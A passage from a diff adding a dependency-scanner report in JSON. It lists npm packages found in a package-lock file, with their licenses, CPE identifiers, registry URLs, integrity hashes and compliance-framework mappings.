"javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:graceful-fs:graceful-fs:4.2.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:graceful-fs:graceful_fs:4.2.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:graceful_fs:graceful-fs:4.2.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:graceful_fs:graceful_fs:4.2.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:graceful:graceful-fs:4.2.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:graceful:graceful_fs:4.2.11:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/graceful-fs@4.2.11", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a916a255ccf430d7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: gtoken 7.1.0", + "title": "gtoken 7.1.0", + "description": "Package discovered: gtoken 7.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fe4d11ddc8ba95f7", + "name": "gtoken", + "version": "7.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:gtoken:gtoken:7.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/gtoken@7.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz", + "integrity": "sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d28454794acf7740", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: has-symbols 1.1.0", + "title": "has-symbols 1.1.0", + "description": "Package discovered: has-symbols 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fcd80b2c54be3c8f", + "name": "has-symbols", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:has-symbols:has-symbols:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has-symbols:has_symbols:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has_symbols:has-symbols:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has_symbols:has_symbols:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has:has-symbols:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has:has_symbols:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/has-symbols@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f33597863ab8f3be", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: has-tostringtag 1.0.2", + "title": "has-tostringtag 1.0.2", + "description": "Package discovered: has-tostringtag 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7749e9981a33e1c1", + "name": "has-tostringtag", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:has-tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has-tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has_tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has_tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has:has-tostringtag:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:has:has_tostringtag:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/has-tostringtag@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "dependencies": { + "has-symbols": "^1.0.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "96e286f1b1295263", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: hasown 2.0.3", + "title": "hasown 2.0.3", + "description": "Package discovered: hasown 2.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6f96b80a7d603954", + "name": "hasown", + "version": "2.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:hasown:hasown:2.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/hasown@2.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz", + "integrity": "sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==", + "dependencies": { + "function-bind": "^1.1.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e883502c6fb5e040", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: helmet 7.2.0", + "title": "helmet 7.2.0", + "description": "Package discovered: helmet 7.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ad14b3d3d950e009", + "name": "helmet", + "version": "7.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:helmet:helmet:7.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/helmet@7.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/helmet/-/helmet-7.2.0.tgz", + "integrity": "sha512-ZRiwvN089JfMXokizgqEPXsl2Guk094yExfoDXR0cBYWxtBbaSww/w+vT4WEJsBW2iTUi1GgZ6swmoug3Oy4Xw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5ce7a5c301b19471", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: hsl-to-hex 1.0.0", + "title": "hsl-to-hex 1.0.0", + "description": "Package discovered: hsl-to-hex 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5912401178cdcd30", + "name": "hsl-to-hex", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:hsl-to-hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to-hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/hsl-to-hex@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/hsl-to-hex/-/hsl-to-hex-1.0.0.tgz", + "integrity": "sha512-K6GVpucS5wFf44X0h2bLVRDsycgJmf9FF2elg+CrqD8GcFU8c6vYhgXn8NjUkFCwj+xDFb70qgLbTUm6sxwPmA==", + "dependencies": { + "hsl-to-rgb-for-reals": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "342f7c75e7dae76e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: hsl-to-rgb-for-reals 1.1.1", + "title": "hsl-to-rgb-for-reals 1.1.1", + "description": "Package discovered: hsl-to-rgb-for-reals 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "52590567976abaf8", + "name": "hsl-to-rgb-for-reals", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:hsl-to-rgb-for-reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to-rgb-for-reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_rgb_for_reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_rgb_for_reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to-rgb-for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to-rgb-for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_rgb_for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_rgb_for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to-rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to-rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to_rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl-to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl_to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:hsl:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/hsl-to-rgb-for-reals@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/hsl-to-rgb-for-reals/-/hsl-to-rgb-for-reals-1.1.1.tgz", + "integrity": "sha512-LgOWAkrN0rFaQpfdWBQlv/VhkOxb5AsBjk6NQVx4yEzWS923T07X0M1Y0VNko2H52HeSpZrZNNMJ0aFqsdVzQg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + 